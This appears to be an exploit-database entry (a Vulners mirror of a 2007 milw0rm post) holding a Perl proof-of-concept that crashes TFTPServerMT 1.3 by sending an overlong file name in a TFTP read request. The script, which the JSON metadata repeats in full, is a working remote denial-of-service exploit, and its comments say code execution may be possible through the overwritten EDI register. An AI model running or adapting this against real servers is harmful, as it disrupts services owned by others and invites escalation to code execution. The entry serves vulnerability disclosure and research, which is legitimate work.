Search...

TFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC)

2007-03-12T00:00:00

ID EXPLOITPACK:A40D60590430D97B4689271022DAFE93
Type exploitpack
Reporter Umesh Wanve
Modified 2007-03-12T00:00:00

Description

TFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC)

                                        
                                            #################################################################################################################
#    Name : TFTPServerMT v 1.3 Remote Buffer Overflow Dos Exploit
#  
#   Author: Umesh Wanve
#
#     Date: 01-03-2007
#
#   Desc: This is latest version of TFTP server. EDI gets overwritten at 246. So code execution may be possible
#         Someone can better write it. Sending a long file name on the vulnerable server can crash the server.
#
#   Details: http://sourceforge.net/project/showfiles.php?group_id=162512
#
###############################################################################################################
#!/usr/bin/perl

use IO::Socket;
#use strict;

 
my($read_request)="\x00\x01";                                                # GET or PUT request

my($tailer)="\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";                      #transporting mode (eg. netascii)   

my($pad)="\x90" x 279;                                



if ($socket = IO::Socket::INET-&gt;new(PeerAddr =&gt; $ARGV[0],

PeerPort =&gt; "69",

Proto    =&gt; "UDP"))
{
                

                 print $socket "\x00\x01".("A"x242)."BBBB".$tailer;

                 sleep(1);
            
               
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE 

# milw0rm.com [2007-03-12]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:50", "references": [], "description": "\nTFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC)", "edition": 1, "reporter": "Umesh Wanve", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2007-03-12T00:00:00", "title": "TFTP Server 1.3 - Remote Buffer Overflow (Denial of Service) (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:50", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2020-04-01T19:04:50", "rev": 2}, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-03-12T00:00:00", "id": "EXPLOITPACK:A40D60590430D97B4689271022DAFE93", "href": "", "viewCount": 1, "sourceData": "#################################################################################################################\n# Name : TFTPServerMT v 1.3 Remote Buffer Overflow Dos Exploit\n# \n# Author: Umesh Wanve\n#\n# Date: 01-03-2007\n#\n# Desc: This is latest version of TFTP server. EDI gets overwritten at 246. So code execution may be possible\n# Someone can better write it. Sending a long file name on the vulnerable server can crash the server.\n#\n# Details: http://sourceforge.net/project/showfiles.php?group_id=162512\n#\n###############################################################################################################\n#!/usr/bin/perl\n\nuse IO::Socket;\n#use strict;\n\n \nmy($read_request)=\"\\x00\\x01\"; # GET or PUT request\n\nmy($tailer)=\"\\x00\\x6e\\x65\\x74\\x61\\x73\\x63\\x69\\x69\\x00\"; #transporting mode (eg. netascii) \n\nmy($pad)=\"\\x90\" x 279; \n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\nPeerPort => \"69\",\n\nProto => \"UDP\"))\n{\n \n\n print $socket \"\\x00\\x01\".(\"A\"x242).\"BBBB\".$tailer;\n\n sleep(1);\n \n \n close($socket);\n}\nelse\n{\n print \"Cannot connect to $ARGV[0]:23\\n\";\n}\n# __END_CODE \n\n# milw0rm.com [2007-03-12]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}